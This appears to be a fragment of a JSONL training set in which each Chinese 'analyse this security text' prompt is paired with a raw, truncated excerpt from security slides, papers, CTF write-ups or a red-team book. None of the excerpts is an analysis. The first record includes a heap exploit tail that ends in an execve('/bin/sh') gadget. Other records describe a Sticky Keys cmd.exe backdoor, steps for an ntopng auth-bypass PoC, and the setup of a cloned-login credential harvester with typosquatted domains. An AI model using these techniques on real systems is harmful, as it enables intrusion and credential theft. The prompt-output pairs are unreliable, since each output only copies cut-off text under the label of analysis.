p.recvuntil('LOG: ') leak = u64((''+ p.recvuntil(': aa',drop=True)).ljust(8,'\\x00')) log.info('leak libc ' + hex(leak)) # launch_gdb() libc_base = leak - 3953984 environ = 3960632 + libc_base io_vtable = 3954424 + libc_base fake_io = libc_base + 3954115 write_addr(0x67f7b0,p64(fake_io)) write_addr(0x67f7b0 + 0xd8,p64(0x67f8b0)) ''' Update with: $ gem update one_gadget && gem cleanup one_gadget 0x45226 execve(\"/bin/sh\", rsp+0x30, environ) constraints: rax == NULL 0x4527a execve(\"/bin/sh\", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf0364 execve(\"/bin/sh\", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1207 execve(\"/bin/sh\", rsp+0x70, environ) constraints: [rsp+0x70] == NULL ''' write_addr(0x67f8b0 + 0x38,p64(libc_base +0xf1207)) Crypto Signsystem 本来以为是一个RSA的签名没想到 encrypt 函数不是pow 本地测试后发现 encrypt(i, e, N) + encrypt(-i, e, N) == N  发一个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to use CSP to stop XSS Ken Lee Friday, August 2, 13 Who is this guy?  Product Security Engineer at Etsy  Previously worked at a financial software company  @kennysan  klee@etsy.com Friday, August 2, 13 What is CSP?  Content Security Policy  Browser-based XSS Defense  http://www.w3.org/TR/CSP/ Friday, August 2, 13 I throw this into the pages template/html: <script>alert('XSS')</script> Friday, August 2, 13 How does it work?  By default, browsers obeying a CSP do not execute javascript that is inline on the page  In addition, it disallows the eval and similar functions like window.setTimeout Friday, August 2, 13 Content-Security-Policy-Report-Only:default-src *; style-src * 'unsafe-inline'; script-src 'unsafe-inline' 'unsafe-eval' *.googleapis.com *.googleapis.com *.pinterest.com *.etsystatic.com lognormal.net *.google.com *.google-analytics.com *.etsystatic.com *.etsy.com *.etsysecure.com *.truste.com *.thinglink.me *.thebrighttag.com *.facebook.net *.facebook.com *.thinglink.com *.tumblr.com *.btstatic.com *.google-analytics.com *.twitter.com *.atdmt.com *.googleadservices.com *.doubleclick.net *.flickr.com *.iesnare.com *.gstatic.com nxtck.com *.akamaihd.net; report-uri /beacon/csp.php A sample CSP Friday, August 2, 13 CSP directives  connect-src  font-src  frame-src  img-src  media-src  object-src  style-src  none  self  unsafe-inline  unsafe-eval Friday, August 2, 13 report-only mode  report-uri specifies URI to POST CSP issues  Doesnt actually block content from loading Friday, August 2, 13 CSP is still evolving... Browsers are mostly CSP 1.0 compliant these days Friday, August 2, 13 What about Inline JS?  CSP 1.0 says: create external scripts out of your inline js  Or you can have unsafe-inline as a directive  If you use require.js or any other async javascript library, gl/hf;  CSP 1.1 to the rescue  ...some day? Friday, August 2, 13 http://www.etsy.com/listing/157723652/keep-calm-and-hold-my-beer-poster-117-x Friday, August 2, 13 Rolling Out CSP  How should ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSticky Keys to the Kingdom PRE-AUTH SYSTEM RCE ON WINDOWS IS MORE COMMON THAN YOU THINK DENNIS MALDONADO & TIM MCGUFFIN LARES Agenda  About Us  Problem Background  Our Solution  Statistics  Prevention / Remediation  Summary www.lares.com About Us  Dennis Maldonado  Adversarial Engineer  LARES Consulting  Founder  Houston Locksport  Houston Area Hackers Anonymous (HAHA)  Tim McGuffin  Red Team Manager  LARES Consulting  10-year DEFCON Goon  DEFCON CTF Participant  Former CCDC Team Coach www.lares.com Windows Accessibility Tools Binary Description How to access C:\\Windows\\System32\\Utilman.exe Utility Manager Windows Key + U C:\\Windows\\System32\\sethc.exe Accessibility shortcut keys Shift 5 times C:\\Windows\\System32\\osk.exe On-Screen Keyboard Locate the option on the screen using the mouse C:\\Windows\\System32\\Magnify.exe Magnifier Windows Key + [Equal Sign] C:\\Windows\\System32\\Narrator.exe Narrator Windows Key + Enter C:\\Windows\\System32\\DisplaySwitch.exe Display Switcher Windows Key + P C:\\Windows\\System32\\AtBroker.exe Manages switching of apps between desktops Have osk.exe, Magnify.exe, or Narrator.exe open then lock the computer. AtBroker.exe will be executed upon locking and unlocking History  How to Reset Windows Passwords websites  Replace sethc.exe or utilman.exe with cmd.exe  Reboot, Press Shift 5x or WIN+U  net user (username) (password)  Login!  Nobody ever cleans up after themselves  Can be used as a backdoor/persistence method  No Windows Event Logs are generated when backdoor is executed Implementation  Binary Replacement  Replace any of the accessibility tool binaries  Requires elevated rights  May require taking ownership of files  Registry (Debugger Method)  HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe  Debugger REG_SZ C:\\Windows\\System32\\cmd.exe  Requires elevated rights Limitations  Elevated access or offline system required  Replacing binary must be Digitally Signed  Replacing binary must exist in \\System32\\", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsysctl === 时动态地修改内核的运行参数 ## 补充说明 **sysctl命令** 被用于在内核运行时动态地修改内核的运行参数可用的内核参数在目录`/proc/sys`中它包含一些TCP/ip堆栈和虚拟内存系统的高级选项 这可以让有经验的管理员提高引人注目的系统性能用sysctl可以读取设置超过五百个系统变量 ### 语法 ```shell sysctl(选项)(参数) ``` ### 选项 ```shell -n打印值时不打印关键字 -e忽略未知关键字错误 -N仅打印名称 -w当改变sysctl设置时使用此项 -p从配置文件/etc/sysctl.conf加载内核参数设置 -a打印当前所有可用的内核参数变量和值 -A以表格方式打印当前所有可用的内核参数变量和值 ``` ### 参数 变量=值设置内核参数对应的变量值 ### 实例 查看所有可读变量 sysctl -a 读一个指定的变量例如`kern.maxproc` sysctl kern.maxproc kern.maxproc: 1044 要设置一个指定的变量直接用`variable=value`这样的语法 ```shell sysctl kern.maxfiles=5000 kern.maxfiles: 2088 -> 5000 ``` 您可以使用sysctl修改系统变量也可以通过编辑sysctl.conf文件来修改系统变量sysctl.conf看起来很像rc.conf它用`variable=value`的形式来设定值指定的值在系统进入多用户模式之后被设定并不是所有的变量都可以在这个模式下设定 sysctl变量的设置通常是字符串数字或者布尔型布尔型用 1 来表示'yes'用 0 来表示'no' ```shell sysctl -w kernel.sysrq=0 sysctl -w kernel.core_uses_pid=1 sysctl -w net.ipv4.conf.default.accept_redirects=0 sysctl -w net.ipv4.conf.default.accept_source_route=0 sysctl -w net.ipv4.conf.default.rp_filter=1 sysctl -w net.ipv4.tcp_syncookies=1 sysctl -w net.ipv4.tcp_max_syn_backlog=2048 sysctl -w net.ipv4.tcp_fin_timeout=30 sysctl -w net.ipv4.tcp_synack_retries=2 sysctl -w net.ipv4.tcp_keepalive_time=3600 sysctl -w net.ipv4.tcp_window_scaling=1 sysctl -w net.ipv4.tcp_sack=1 ``` ### 配置sysctl 编辑此文件`/etc/sysctl.conf` 如果该文件为空则输入以下内容否则请根据情况自己做调整 ```shell # Controls source route verification # Default should work for all interfaces net.ipv4.conf.default.rp_filter = 1 # net.ipv4.conf.all.rp_filter = 1 # net.ipv4.conf.lo.rp_filter = 1 # net.ipv4.conf.eth0.rp_filter = 1 # Disables IP source routing # Default should work for all interfaces net.ipv4.conf.default.accept_source_route = 0 # net.ipv4.conf.all.accept_source_route = 0 # net.ipv4.conf.lo.accept_source_route = 0 # net.ipv4.conf.eth0.accept_source_route = 0 # Controls the System Request debugging functionality of the kernel kernel.sysrq = 0 # Controls whether core dumps will append the PID to the core filename. # Useful for debugging multi-threaded applications. kernel.core_uses_pid ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Docker 所面临的风险 --- <center><h1>Docker 所面临的风险</h1></center> --- ## 1容器镜像存在的风险 ### 不安全的第三方组件 例如开发者在代码中引入了存在漏洞版本的 log4j2 组件然后将其打包成了业务镜像这样即使代码没有漏洞但因为引入了不安全的第三方组件也变得有漏洞了 再比如开发者在 Django 镜像的基础上编写了自己的 Python 代码然后将其打包成镜像这样如果在 Django 镜像里引用了不安全的第三方组件或者 Django 自身存在漏洞自己打包的镜像也同样会受到影响 ### 不安全的镜像 在公共镜像仓库比如 Docker Hub 里会存在一些有漏洞的镜像或者恶意镜像如果使用了这些镜像那就存在风险了 ### 敏感信息泄露 如果开发者为了开发调试方便可能会将数据库账号密码云服务密钥之类的敏感数据打包到了镜像里那别人获取到这个镜像后就会导致敏感信息泄露了 ## 2活动中的容器存在的风险 ### 不安全的容器应用 在使用容器时往往会需要进行端口映射比如把 MySQL 的 3306 端口映射出来如果 MySQL 被配置了弱密码那就存在被利用的风险了 除此之外如果一个 Web 服务端口被映射出来同时这个 Web 服务存在漏洞那么也同样是存在风险的 ### 不受限制的资源共享 容器运行在宿主机上容器必然要使用宿主机的各种 CPU内存等资源如果没有对容器进行资源使用限制那么就存在宿主机被资源耗尽的风险 ### 不安全的配置与挂载 如果为容器设定了不安全的配置会导致容器本身的隔离机制失效容器的两大隔离机制如下 - Linux 命名空间NameSpace实现文件系统网络进程主机名等方面的隔离 - Linux 控制组cgroups实现 CPU内存硬盘等方面的隔离 如果设定了以下配置就会导致相应的隔离机制失效 - --privileged使容器内的 root 权限和宿主机上的 root 权限一致权限隔离被打破 - --net=host使容器与宿主机处于同一网络命名空间网络隔离被打破 - --pid=host使容器与宿主机处于同一进程命令空间进程隔离被打破 - --volume /:/host宿主机根目录被挂载到容器内部文件系统隔离被打破 ## 3容器管理程序接口的风险 Docker 守护进程主要监听 UNIX socket 和 TCP socket默认情况下Docker 只会监听 UNIX socket ### UNIX socket UNIX socket 的风险主要在于 Docker 守护进程默认以宿主机的 root 权限运行因此就可以借助这点进行提权或者容器逃逸 这类风险主要有两个利用场景 - 普通用户被加到 Docker 用户组内 如果普通用户被加入到 Docker 用户组内那么普通用户也将有权限访问 Docker UNIX socket如果攻击者获得了这个普通用户权限就可以借助 Docker 提权到 root 用户权限 具体的做法可以简单描述为使用普通用户创建一个 privileged 为 true 的容器在该容器内挂载宿主机硬盘并写入定时任务然后将宿主机的 root 权限反弹回来后期将详细介绍这种方法的使用 - UNIX socket 挂载到容器内部 有时为了实现容器内部管理容器可能会将 Docker UNIX socket 挂载到容器内部那么如果该容器被入侵RT 就可以借助这个 socket 进行容器逃逸获得宿主机 root 权限 ### TCP socket 现在 Docker 守护进程默认不会监听 TCP socket不过有时可能用户会因为方便开启 TCP socket 的监听一般默认监听端口是 2375 默认情况下Docker 守护进程 TCP socket 是无加密无认证的因此如果发现宿主机 Docker 开放了 TCP socket就可以直接使用 docker -H 接管目标的容器 ## 4其他风险 ### 容器网络风险 虽然默认情况下容器内部的网络与宿主机是隔离的但是每个容器之间是彼此互相连通的理论上在容器之间是存在内网横向的风险的 ### 宿主机操作系统风险 容器通常与宿主机共享内核也就是说如果宿主机内核存在漏洞意味着容器可能也会存在相同的漏洞 例如如果宿主机存在脏牛漏洞那么拿到容器权限后使用脏牛漏洞就可以获得宿主机权限实现容器逃逸 ### 软件自身的漏洞 Docker 自身存在的一些漏洞比如 CVE-2019-14271CVE-2019-5736 等都可以导致容器逃逸这些也都是风险点后面会对这些漏洞进行尝试复现 > 参考地址 > > 云原生安全-攻防实践与体系构建 > > https://docs.docker.com/get-st", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCan You Trust Autonomous Vehicles: Contactless Attacks against Sensors of Self-driving Vehicle Chen Yan Zhejiang University yanchen@zju.edu.cn Wenyuan Xu Zhejiang University & University of South Carolina wyxu@cse.sc.edu Jianhao Liu Qihoo 360 liujianhao@360.cn ABSTRACT To improve road safety and driving experiences, autonomous vehicles have emerged recently, and they can sense their sur- roundings and navigate without human intervention. Al- though promising and proving safety features, the trustwor- thiness of these cars has to be examined before they can be widely adopted on the road. Unlike traditional network security, autonomous vehicles rely heavily on their sensory ability of their surroundings to make driving decision, which incurs a security risk from sensors. Thus, in this paper we examine the security of the sensors of autonomous vehicles, and investigate the trustworthiness of the eyes of the cars. Our work investigates sensors whose measurements are used to guide driving, i.e., millimeter-wave radars, ultra- sonic sensors, forward-looking cameras. In particular, we present contactless attacks on these sensors and show our results collected both in the lab and outdoors on a Tesla Model S automobile. We show that using o-the-shelf hard- ware, we are able to perform jamming and spoofing attacks, which caused the Teslas blindness and malfunction, all of which could potentially lead to crashes and impair the safety of self-driving cars. To alleviate the issues, we propose soft- ware and hardware countermeasures that will improve sen- sor resilience against these attacks. Keywords Autonomous vehicles; security; ultrasonic sensors; millimeter- wave radars; cameras 1. INTRODUCTION Improving road safety, driving experiences, and driving efficiency has long been a focus of the automotive indus- try, and already we have witnessed the rapid development of ADAS (Advanced Driver Assistance Systems), which can sense its driving environment and warn drivers of immediate d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ntopng Authentication Bypass (CVE-2021-28073) [中文版本(Chinese version)](README.zh-cn.md) Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng 4.2 and previous versions. Reference link: - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ ## Vulnerability Environment Execute the following command to start ntopng: ``` docker compose up -d ``` After the server is started, browse the `http://your-ip:3000` to see the login page, whose default password is admin/admin, and the password will be request to reset for the first login. ## Vulnerability Reproduce According to the reference link and the simple [poc.py](poc.py), calculate the length of the ntopng lua directory: ``` python poc.py --url http://your-ip:3000/ baselength ``` ![](1.png) It can be seen that the path length in the Vulhub container is 36. Then, browse the page or interface that we want to access without authorization, such as `/lua/find_prefs.lua`, and it will be redirected to the login page. Use POC to generate unauthorized access URL: ``` python poc.py --url http://your-ip:3000/ generate -l 36 -p find_prefs.lua ``` ![](2.png) The interface is able to access without authorization through this URL: ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nServlet的线程安全问题 引 先看看这样的代码有什么问题 这既要求cmd不能包含 Calculator 又必须要包含 Calculator 能做到吗当然是可以 的 Servlet的多线程机制 Servlet实际上是个单件当我们第次请求某个Servlet时Servlet容器将会根据web.xml配 置件或者是注解实例化这个Servlet类之后如果又有新的客户端请求该Servlet时则般不 会再实例化该Servlet类这说明了什么呢简单来说当多个户起访问时得到的其实是 同个Servlet实例这样的话他们对实例的成员变量的修改其实会影响到别所以在开发 的时候如果没有注意这个问题往往会有些额安全问题往往Servlet的线程安全问题主要是 由于实例变量使不当引起 因此我们再看上的代码很明显我们看到了这个 status 状态变量是实例变量当然这 为了突出并发的效果这加了个延时这简简单单python实现竞争也不必上多线程 了简单点 如何修复 1.实现 SingleThreadModel 接 url = \"http://127.0.0.1:8080/?cmd=open -na Calculator\" while 1: r = requests.get(url) if \"Cal\" in r.text: print(r.text) url = \"http://127.0.0.1:8080/?cmd=ls\" while 1: r = requests.get(url) 该接指定了系统如何处理对同个Servlet的调如果个Servlet被这个接指定那么 在这个Servlet中的service法将不会有两个线程被同时执当然也就不存在线程安全的问 题这种法只要继承这个接就了,因此将我们上的代码改为 这样你觉得就完全安全了吗答案也不是如果我们将上的对状态的定义加上static呢 lol还是可以成功原因是SingleThreadModel不会解决所有的线程安全隐患会话属性和静 态变量仍然可以被多线程的多请求同时访问 还有点很重要该接在Servlet API 2.4中将不推荐使 2.避免使成员变量 既然问题出成员变量那么我们就尽量避免去使它 将上的代码改为 public class TestServlet extends HttpServlet implements SingleThreadModel public static boolean status; public class TestServlet extends HttpServlet{ // public boolean status; @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { 3.同步对共享数据的操作 使synchronized 关键字能保证次只有个线程可以访问被保护的区段因此可以将代码写 为 boolean status = true; String cmd = req.getParameter(\"cmd\"); if (cmd.contains(\"Calculator\")) { status = false; try { Thread.sleep(1000); }catch (Exception e){ } } if (!status) { return; } if (cmd.contains(\"Calculator\")){ resp.getWriter().write(cmd); } } } public class TestServlet extends HttpServlet{ public boolean status; @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String cmd = req.getParameter(\"cmd\"); boolean status; synchronized(this) { status = true; if (cmd.contains(\"Calculator\")) { 思考与结 但是如果利上三种式去修复这样就完全没问题了吗并不是 如实现SingleThreadModel以及在程序中使同步来保护要使的共享的数据在实际业务 当中这也会使得我们系统的性能下降这也是我们不太希望看到的前者为每个新的请 求创建个单独的Servlet实例这将引起量的系统开销后者被同步", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSSCTF Writeup by Nu1L (本报告包含了 SSCTF 所有的题目包括比赛时为做出来的题目) 逆向部分Reverse Re100 这题很简单首先判断用户名是否等于 secl-007 然后调用动态链接库中的 getpl 函数验证 password由于在函数中没有对 password 做处理 因此可以忽略中间的 DES 加密输入 39 个字符或者修改寄存器的值在最后判断的时候下 断动态调试下就能得到 flag flag 为 oty3eaP$g986iwhw32j%OJ)g0o7J.CG: Re200 拿到程序打开运行输入任意字符串后发现一段 Bad Apple 的 MV... 动画结束后有验 证过程 首先查壳发现是加过 UPX 壳的upx -d 脱掉之后开始分析程序 发现在 402800 处是播放动画的代码但其中有几条关键的 ResumeThread于是 nop 掉动画 部分代码 接下来根据 ResumeThread 处的代码找到了创建线程的位置 继续分析这些线程发现了验证 Flag 的位置根据线程运行顺序可以反向写出解密代码 脚本 #!/usr/bin/env python2 # -*- coding:utf-8 -*- import hashlib import numpy as np def u8(x): return np.uint8(x) ''' hash[0] = -3; hash[2] = -3; hash[1] = -59; hash[3] = -25; hash[5] = -25; hash[4] = -59; hash[6] = -57; hash[8] = -57; hash[7] = -27; hash[10] = -27; hash[9] = -35; hash[11] = -35; hash[12] = 0; ''' md5res = 'FBC4A31E4E17D829CA2242B2F893481B'.lower() #print md5res d = [253,197,253,231,197,231,199,229,199,221,229,221] #d = [u8(c) for c in data] #print d for x in range(256): p = ''.join([chr(cx) for c in d]) md5 = hashlib.new('md5') for c in p: if ord(c) == 0: break md5.update(c) if md5.hexdigest() == md5res: print x # key1 = 181 v0 = (181 - 1)2 print v0 # v0 = 182 byte_404048 = [0x57,0x78,0x7d,0x3e,0x4a,0x4c,0x5c,0x35,0x2a,0x23,0x50,0x7f,0x57,0x7 8,0x55,0x64,0x4b,0x42,0x25,0x35,0x22,0x66,0x48] for x2 in range(256): xored = [cx2 for c in byte_404048] sum = 0 for c in xored: if c == 0: break sum = c if sum == 182: print x2 print '-------' # 152 for x3 in range(256): if ((x30x5a)+(x30x42)) == 152: print x3 print '------' d3 = [0xF5, 0xD0, 0xDF, 0xDC, 0x99, 0xD8, 0xD5, 0xCE, 0xD8, 0xC0, 0xCA, 0x99, 0xD4, 0xD8, 0xD2, 0xDC, 0xCA, 0x99, 0xCC, 0xCA, 0x99, 0xDB, 0xD5, 0xD8, 0xDA, 0xD2, 0x99, 0xD8, 0xD7, 0xDD, 0x99, 0xDB, 0xD5, 0xCC, 0xDC, 0x95, 0xD8, 0xD7, 0xDD, 0x99, 0xCD, 0xD1, 0xD6, 0xCA, 0xDC, 0x99, 0xCE, 0xD1, 0xDC, 0xCB, 0xDC, 0x99, 0xCD, 0xD1, 0xDC, 0x99, 0xCE, 0xD6, 0xCC, 0xD7, 0xDD, 0x99, 0xD1, 0xD8, 0xDD, 0x99, 0xDB, 0xDC, 0xDC, 0xD7, 0x99, 0xCD, 0xD1, 0xDC, 0x99, 0xCA, 0xCD, 0xCB, 0x", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Help Me Reset 2 Web Exploitation, 600 points ## Description: > There is a website running at http://2018shell3.picoctf.com:52603 (link). We need to get into any user for a flag! ## Solution: The link led to a website which contained a login page, together with a \"Forgot your password\" mechanism. The \"Forgot your password\" mechanism required a username to proceed. None of the common usernames seemed to work, and both forms did not seem vulnerable to any common attacks. At this point, I turned to some automated tools to scan the site. One of them was dirsearch, which scans the site for common URIs: ```console # python3 dirsearch.py -u http://2018shell3.picoctf.com:52603/ -ext=\"*\" _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: xt=* | Threads: 10 | Wordlist size: 6040 Error Log: /root/utils/dirsearch/logs/errors-18-10-24_23-23-21.log Target: http://2018shell3.picoctf.com:52603/ [23:23:22] Starting: [23:31:20] 200 - 1019B - /login [23:31:25] 302 - 209B - /logout -> http://2018shell3.picoctf.com:52603/ [23:33:21] 200 - 804B - /profile [23:33:45] 200 - 899B - /reset Task Completed ``` The profile page was accessible without any authentication needed: ```console root@kali:/media/sf_CTFs/pico/Help_Me_Reset_2# curl -s http://2018shell3.picoctf.com:52603/profile | grep pico <title>Congrats flag: picoCTF{i_thought_i_could_remember_those_a131a54c}</title> <h1>Congrats flag: picoCTF{i_thought_i_could_remember_those_a131a54c}</h1> ``` This is ironic, given the fact that the hint to the challenge says \"Try looking past the typical vulnerabilities. Think about possible programming mistakes\" and the expected solution (according to other writeups) is to use the maintainer username as appears in the site comments: ```console root@kali:/media/sf_CTFs/pico/Help_Me_Reset_2# curl -s http://2018shell3.picoctf.com:52603/ | grep maintained <!--Proudly maintained by goncalves--> ``` The flag: picoCTF{i_thought_i_could_remember_those_a131a54c}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nResponse Smuggling: Exploiting HTTP/1.1 Connections Martin Doyhenard Onapsis mdoyhenard@onapsis.com Abstract Over the past few years, we have seen some novel presentations re-introducing the concept of HTTP request smuggling, to reliably exploit complex landscapes and systems. With advanced techniques, attackers were able to bypass restrictions and breach the security of critical web applications. But, is everything said on HTTP Desync Attacks, or is it just the tip of the iceberg? This paper will take a new approach, focusing on the HTTP Response Desynchronization, a rather unexplored attack vector. By smuggling special requests it is possible to control the response queue, allowing an attacker to inject crafted messages in the HTTP pipeline. This can be leveraged to hijack victims sessions from login requests, flood the TCP connection for a complete Denial of Service, and concatenate responses using a vulnerability called HTTP method confusion. This research presents a novel technique, known as Response Scripting, to create malicious outbound messages using static responses as the building blocks. Finally, by splitting reflected content, this paper will demonstrate how an attacker would be able to inject arbitrary payloads in the response pipeline. This will be leveraged to write custom messages and deliver them back to the victims. This document will also introduce a Desync variant, used to hide arbitrary headers from the backend. This technique does not abuse discrepancy between HTTP parsers, but instead relies on a vulnerability in the HTTP protocol definition itself. Abstract 1 Introduction 3 HTTP Request Smuggling 3 HTTP Desync Variant 4 HTTP Response Smuggling 5 Response Injection 5 Response Hijacking 6 Request Chaining 7 Request Hijacking 8 HTTP Response Concatenation 10 HEAD Response Length 10 HTTP Method Confusion 10 Response Concatenation 11 HTTP Response Scripting 12 Reflected Header Scripting 12 Content-Type confusion & Security bypass 14 Session Hijac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 第5章 助攻社会工程学攻击 > 译者[@Snowming](https://github.com/Snowming04) ![](../images/chapter_5/5-1.png) ## 开始社会工程学攻击行动 作为红队队员我们钟爱社会工程学攻击不仅因为它通常包含低技能攻击而且因为它也很容易以非常低的成本来策划一场值得我们高度信赖的战役只需设置几个假域名服务器策划一些电子邮件假装丢掉一些 bad USB然后就可以结束一天的工作了 > 译者注: 这里提到的低技能攻击 原文是 low skillset attacks我的理解是无需太多技能的攻击比如踩点垃圾收集...... 在衡量的指标方面我们一般用捕捉到的明显的信息例如发送的电子邮件数量点击了钓鱼链接的用户数量以及键入密码的用户数量我们也试图发挥创意为雇用我们的公司带来实质性价值这方面的一个例子是 DefCon 会议举办的的社会工程学竞赛在这个竞赛中参赛选手要通过社工的方式来入侵公司和雇员如果你不熟悉这个竞赛的话那我简略地介绍一下参赛选手们需要在有限的时间内针对目标公司找到一些 flag通过获取公司信息如他们的 VPN 他们使用的杀毒软件类型员工的特定信息或让员工访问钓鱼 URL 等方法可以捕获 flag如果你想查看比赛中的使用的所有 flag请查看2017年的比赛报告http://bit.ly/2HlctvY  这些类型的攻击可以通过教导员工学会发现恶意行动并向相关负责团队报告从而帮助公司提高内部安全意识 在本章中我们将粗浅的接触一些用来进行社会工程学攻击的工具和技术对于社会工程学攻击没有正确或错误的答案只要能发挥作用在我们的书里就是好的 ### 近似域名Doppelganger Domain 在上本书中我们讲了很多关于近似域名的内容如今近似域名仍然是获取初始凭证或者植入恶意软件的最成功方法之一最常用的技术是购买一个与目标公司的URL非常相似的域名或者是目标公司 URL 的一个常见拼写错误的域名 在上一本书中我们举了一个例子如果我们的目标公司有 mail.cyberspacekittens.com 这个域名我们将购买 mailcyberspacekittens.com 这个域名并设置一个假的 Outlook 页面来获取登录凭证当受害者进入假网站并输入密码时我们会收集这些数据并将其重定向到公司的有效电子邮件服务器mail.cyberspacekittens.com这给受害者留下这样的印象他们只是第一次意外地输错了密码因此再次输入正确密码并登录他们的帐户 这种方法最巧妙地一点是你甚至不用做任何网络钓鱼的操作因为有些人就是会打错域名或者手误漏掉 mail 和 cyberspacekittens 之间的点.然后进入了错误的网页并输入他们的登录凭证我们会提示让受害者把我们的恶意网站添加为书签这样可以让受害者每天都访问我们的恶意网页 ### 如何克隆验证页面 快速克隆Web应用程序登录验证页的最佳工具之一是 TrustedSec 公司开发的社会工程学工具包Social Engineering Toolkit简称 SET这是任何需要获取身份凭证的社工活动的标准工具包你可以从 https://github.com/trustedsec/social-engineer-toolkit 下载这个工具包 配置 SET: - 将 SET 配置为使用 Apache而不是默认的 Python  - 将配置文件按照以下内容修改 - gedit /etc/setoolkit/set.config - APACHE_SERVER=ON - APACHE_DIRECTORY=/var/www/html - HARVESTER_LOG=/var/www/html - 启动 SET: - cd /opt/social-engineer-toolkit - setoolkit - (1) Spear-Phishing Attack Vectors 鱼叉式钓鱼攻击 - (2) Website Attack Vectors网站攻击 - (3) Credential Harvester Attack Method 凭证收集攻击方法 - (4) Site Cloner站点克隆器 - 输入你的攻击服务器的 IP - 克隆目标站点 - 打开浏览器转到攻击服务器并测试 所有文件都会被储存在 /var/www/html 文件夹下密码存储在 Harvester* 下下面是社工活动中克隆页面时的一些比较好的做法 - 搭配使用 Apache 服务器 + SSL - 把所有图像和资源移到本地而不是从被克隆的站点调用 - 就我个人而言我喜欢使用我的 PGP 公钥来存储所有记录的密码这样如果服务器受到入侵就无法在没有私钥的情况下恢复密码", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nopenjdk8 编译与clion 调试 1 openjdk8 编译与clion 调试 Created Tags Mac catalina 10.15.7  base java version = 1.8.91 step by step: brew install mercurial brew install autoconf brew install freetype brew install ccache xcode-select install or xcode-select install gcc -v Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx- include- dir=/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/c++/4.2.1 Apple clang version 12.0.0 (clang-1200.0.32.29) Target: x86_64-apple-darwin19.6.0 Thread model: posix InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin ll /usr/bin/llvm-g++ lrwxr-xr-x 1 root wheel 7B 10 29 2019 /usr/bin/llvm-g++ -> clang++ ll /usr/bin/llvm-gcc lrwxr-xr-x 1 root wheel 5B 10 29 2019 /usr/bin/llvm-gcc -> clang @October 14, 2021 5:24 PM openjdk8 编译与clion 调试 2 clang++ -v Apple clang version 12.0.0 (clang-1200.0.32.29) Target: x86_64-apple-darwin19.6.0 Thread model: posix InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin clang -v Apple clang version 12.0.0 (clang-1200.0.32.29) Target: x86_64-apple-darwin19.6.0 Thread model: posix InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin download jdk8u least source code from codebase hg clone http://hg.openjdk.java.net/jdk8u/jdk8u jdk8u chmod 777 get_source.sh ./get_source.sh openjdk8 编译与clion 调试 3 chmod 777 configure ./configure --with-debug-level=slowdebug openjdk8 编译与clion 调试 4 sudo make LOG=trace all openjdk8 编译与clion 调试 5 if you laptop have 8 core 16 threads, may be 10mins. if you get some problem, congratulations, You fuck up. CMakeLists.txt cmake_minimum_required(VERSION 3.14) # 这个设置不需要严格对应建个测试项复制过来这段即可 openjdk8 编译与clion 调试 6 project(hotspot) file(GLOB_RECURSE SOURCE_FILES \"*.cpp\" \"*.hpp\" \"*.c\" \"*.h\") include_directories(hotspot/src/share/vm) include_directories(hotspot/src/cpu/x86/vm) include_directories(hotspot/src/share/vm/precompi", "category": "text_analysis", "source": "security_papers"}
